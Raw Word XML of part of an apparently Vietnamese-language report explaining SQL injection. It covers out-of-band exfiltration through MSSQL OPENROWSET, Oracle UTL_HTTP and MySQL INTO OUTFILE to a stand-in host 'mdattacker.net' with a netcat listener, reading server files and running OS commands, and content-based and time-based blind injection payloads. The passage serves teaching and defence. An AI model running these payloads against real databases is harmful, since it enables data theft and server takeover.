      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Trên các phiên bản MSSQL 2000 trở về trước, lệnh OpenRowSet cho phép mở kết nối đến một CSDL khác và thực hiện insert dữ liệu vào. Ví dụ câu truy vấn sẽ mở kết nối đến CSDL của kẻ tấn công và ghi chuỗi thông tin phiên bản vào bảng tên là foo. Lưu ý là ở đây sử dụng cổng 80 để vượt qua một số luật chặn chiều ra của các Firewall cơ bản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insert into openrowset(‘SQLOLEDB’,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>‘DRIVER={SQL Server};SERVER=mdattacker.net,80;UID=sa;PWD=letmein’,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>‘select * from foo’) values (@@version)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Oracle:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> DBMS này có rất nhiều hàm, chức năng cho phép tạo một kênh out-of-band tới một máy chủ khác. UTL_HTTP package có thể sử dụng để tạo ra các yêu cầu dạng HTTP như ví dụ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/employees.asp?EmpNo=7521’||UTL_HTTP.request(‘mdattacker.net:80/’||</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>URL trên tạo ra một UTL_HTTP, gửi một URL chứa username đầu tiên trong bảng all_users. Kẻ tấn công đơn giản sử dụng netcat trên máy chủ mdattacker.net để nhận kết quả:</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C:\&gt;nc -nLp 80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>GET /SYS HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>Host: mdattacker.net</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Sử dụng lệnh SELECT ... INTO OUTFILE để ghi trực tiếp kết quả của câu truy vấn vào file, trong đó các tệp tin có thể sử dụng đường dẫn dạng UNC để ghi vào máy chủ của kẻ tấn công. Ví dụ:</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into outfile ‘\\\\mdattacker.n</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:lastRenderedPageBreak/>
              <w:t>et\\share\\output.txt’ from users;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Để </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hận dữ liệu, kẻ tấn công tạo một SMB server có quyền ghi cho tài khoản anonymous.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Như vậy, hoàn toàn có thể sử dụng các kỹ thuật này để nhận dữ liệu trong các trường hợp không thể nhận được trực tiếp trong HTML trên trình duyệt. Tuy nhiên, các kỹ thuật này đỏi hỏi các máy chủ phải mở chiều ra đến được máy tính của kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc459374319"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Các kỹ thuật tấn công nâng cao</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong một số trường hợp, dữ liệu không phải là mục tiêu chính của hacker. Mục tiêu đó có thể là chính máy chủ, để hacker có thể lợi dụng thực hiện các âm mưu tấn công khác. Các kỹ thuật tấn công nâng cao này có thể kể đến như:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đọc/ghi các file trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thực thi câu lệnh hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong ví dụ trên đã thấy MySQL có tập lệnh hỗ trợ việc ghi file. Đây là một trong những yếu tố tạo điều kiện cho việc tấn công nâng quyền, chiếm quyền điều khiển máy chủ. MySQL cũng cung cấp lệnh LOAD DATA INFILE và  LOAD_FILE để đọc file trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E447F5E" wp14:editId="34D72439">
            <wp:extent cx="4394835" cy="36366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6"/>
                    <a:srcRect t="3344" b="7032"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4394835" cy="3636645"/>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31" w:name="_Toc458436421"/>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9</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Đọc file /etc/passwd trên máy chủ.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đối với MSSQL Server có thể sử dụng scripting.filesystem để đọc/ghi file trên máy chủ. Trong khi Oracle lại hỗ trợ rất nhiều cách để đọc ghi file như UTL_FILE, DBMS_ADVISOR, DBMS_XSLPROCESSOR, DBMS_XMLDOM,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> External tables, Java. Ngoài ra, còn một cách nữa là sử dụng câu lệnh hệ điều hành. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối với MySQL, mặc định không hỗ trợ tính năng thực thi câu lệnh hệ điều hành. Để sử dụng tính năng này cần sử dụng một bộ thư viện ngoài (UDF). Kẻ tấn công thường sử dụng DUMP File để ghi tập tin udf lên máy chủ, sau đó nạp file thư viện vào mysql để thực thi câu lệnh hệ điều hành. Đối với MSSQL Server hỗ trợ xp_cmdshell để thực thi điều này, cũng có rất nhiều tài liệu mô tả chi tiết thực hiện. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong phần này có trình bày các hướng để thực hiện trích xuất dữ liệu, cũng như một số hướng tấn công nâng cao. Khai thác lỗ hổng này, kẻ tấn công không chỉ đánh cắp, chỉnh sửa toàn bộ dữ liệu mà còn có thể lợi dụng để chiếm quyền điều khiển cả máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc459374320"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Có nhiều lý do làm cho tấn công dạng out-of-band không phổ biến. Một trong những lý do là các máy chủ CSDL thường nằm trong phân vùng mạng được bảo vệ, có sử dụng các tường lửa để chặn các kết nối chiều ra (outbound connection). Trong những trường hợp này, khả năng tươ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ng tác với CSDL thông quan lỗ hổng SQL injection bị hạn chế. Trong những trường hợp này, cần phải làm thế nào đó để nhận được dữ liệu trả về. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tuy nhiên lưu ý là dữ liệu trả về không nằm trong reponse cho trình duyệt, hay thực hiện các kênh out-of-band để gửi trả dữ liệu. Lúc này, kẻ tấn công được ví như một người mù (blind) tìm cách để đoán một thứ đồ không thể nhìn thấy được. Tương tự trong tình huống này, vẫn có những kỹ thuật cho phép nhận được dữ liệu trả về, thông qua việc inject các câu lệnh điều kiện, sẽ được kích hoạt tùy thuộc vào nội dung CSDL, và các phương pháp phân tích để nhận được nội dung trả về này. Tùy thuộc vào kiểu hình thái mà </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> buộc ứng dụng phải trả về, tấn công Blind SQL injection được chia làm 02 kỹ thuật chính: Content-Based và Time-Based.</w:t>
      </w:r>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bookmarkStart w:id="33" w:name="_Toc458409275"/>
      <w:bookmarkStart w:id="34" w:name="_Toc458409345"/>
      <w:bookmarkStart w:id="35" w:name="_Toc458433471"/>
      <w:bookmarkStart w:id="36" w:name="_Toc459373888"/>
      <w:bookmarkStart w:id="37" w:name="_Toc459373948"/>
      <w:bookmarkStart w:id="38" w:name="_Toc459374321"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>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bookmarkStart w:id="39" w:name="_Toc458409276"/>
      <w:bookmarkStart w:id="40" w:name="_Toc458409346"/>
      <w:bookmarkStart w:id="41" w:name="_Toc458433472"/>
      <w:bookmarkStart w:id="42" w:name="_Toc459373889"/>
      <w:bookmarkStart w:id="43" w:name="_Toc459373949"/>
      <w:bookmarkStart w:id="44" w:name="_Toc459374322"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00603AE9" w:rsidRPr="00603AE9" w:rsidRDefault="00603AE9" w:rsidP="00603AE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc458409277"/>
      <w:bookmarkStart w:id="46" w:name="_Toc458409347"/>
      <w:bookmarkStart w:id="47" w:name="_Toc458433473"/>
      <w:bookmarkStart w:id="48" w:name="_Toc459373890"/>
      <w:bookmarkStart w:id="49" w:name="_Toc459373950"/>
      <w:bookmarkStart w:id="50" w:name="_Toc459374323"/>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00603AE9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc459374324"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công Blind SQL injection dạng Content-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một cấu trúc điều kiện khác thường được sử dụng với DBMS MSSQL Server. Cùng phân tích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http://www.victim.com/products.asp?id=12%2B(case+when+(system_user+=+‘sa’)+then+1+else+0+end)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Có một sự khác biệt là ký tự “+” đã được URL encode chuyển thành %2B trong URL. Giá trị mà id parameter được nhận sẽ là: id = 12 + (case when (system_user = ‘sa’) then 1 else 0 end). Đây là một cấu trúc khá đơn giản, nếu như system_user là không phải là sa, thì URL tương đương với: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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trường hợp khác, nếu system_user, id=13 và sẽ trả về tương đương với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http://www.victim.com/products.asp?id=13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Hai id khác nhau sẽ trả về hai loại mặt hàng khác nhau, đương nhiên, nội dung sẽ khác nhau. URL đầu tiên có thể là một cuốn sách, URL thứ hai có thể là một cái lò vi sóng. Tùy thuộc vào nội dung trả về, </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoàn toàn biết được, người dùng có phải tài khoản sa hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Quay lại ví dụ về chức năng đăng nhập mắc lỗi, trường username và password được truyền vào câu truy vấn:</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‘marcus’ and password = ‘secr</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:lastRenderedPageBreak/>
              <w:t>et’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Giả sử không xác định được phương pháp để truyền kết quả của câu truy vấn về trình duyệt. Tuy nhiên có thể thay đổi cấu trúc câu lệnh truy vấn để thay đổi những biểu hiện của ứng dụng. Ví dụ, khi gửi lên 2 mã tấn công sẽ trả về 2 kết quả khác nhau:</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admin’ AND 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>admin’ AND 1=2--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong trường hợp thứ nhất, ứng dụng sẽ cho đăng nhập với tài khoản admin. Trong trường hợp thứ hai, sẽ đăng nhập không thành công, vì điều kiện 1=2 luôn trả về false. Có thể tận dụng điều này để điều khiển các trạng thái của ứng dụng, suy luận dựa trên trường hợp đúng, trường hợp sai của câu lệnh để khai thác dữ liệu trong cơ sở dữ liệu. Ví dụ như sử dụng hàm ASCII và SUBSTRING có thể xác một ký tự cụ thể, ở vị trí cụ thể, có một giá trị cụ thể. Trong ví dụ sau, nếu gửi lên chuỗi: admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 65-- thì sẽ đăng nhập thành công với tài khoản admin, bởi vì điều kiện trả về luôn đúng. (Câu điều kiện lấy ký tự đầu tiên trong chuỗi Admin là A, rồi chuyển sang bảng mã ASCII tương ứng mã 65. 65 = 65 sẽ trả về True).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu như gửi lên chuỗi sau sẽ trả về là Fail, đăng nhập không thành công: admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 66-- . Bằng việc gửi lên một loạt các dữ liệu, hết một vòng bảng mã ASCII, hoặc cho đến khi nào kết quả True được trả về sẽ xác định được chuỗi ký tự. Như vậy, bằng cách phân tích nội dung trả về (Content) của dữ liệ</w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>u, kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã xác định được được tính Đúng/Sai của câu truy vấn, từ đó xác định được ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00603AE9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc459374325"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công Blind SQL injection dạng Time-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong tấn công dạng Content-base ở trên, dữ liệu trả vẫn có liên quan nhiều đến câu truy vấn, kết quả vẫn trả về trong nội dung HTML của trình duyệt (dù không thật sự tường minh). Trong một số trường hợp, </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể inject vào câu truy vấn để kết quả không trả về trong HTML. Tấn công out-of-band ở trên cũng như vậy, nhưng đòi hỏi nhiều điều kiện. Trong đa số các trường hợp này, tấn công out-of-band là không có hiệu quả, cũng như việc s</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ử dụng tấn công out-of-band có thể gây ảnh hưởng đến CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để giải quyết vấn đề này, một kỹ thuật đã được phát triển bởi Chris Anley và Sherief Hammad làm việc tại NGSSoftware. Họ đã nghĩ ra cách làm cho câu truy vấn trả về bị trễ một khoảng thời gian, và việc trễ này phụ thuộc vào điều kiện của kẻ tấn công. Sau khi gửi mã tấn công, kẻ tấn công tiến hành theo dõi thời gian trả về. Nếu có sự chậm trễ trong thời gian trả về, kẻ tấn công có thể suy luận là câu lệnh điều kiện là đúng, và ngược lại. Phương pháp này cho phép áp dụng khi cả nội dung trả về của dữ liệu là giống hệt nhau trong cả hai trường hợp câu điều kiện đúng hoặc sai. Giống như phương pháp trên, thực hiện nhiều lần cho phép kẻ tấn công lấy được các dữ liệu phức tạp của CSDL.</w:t>
      </w:r>
    </w:p>
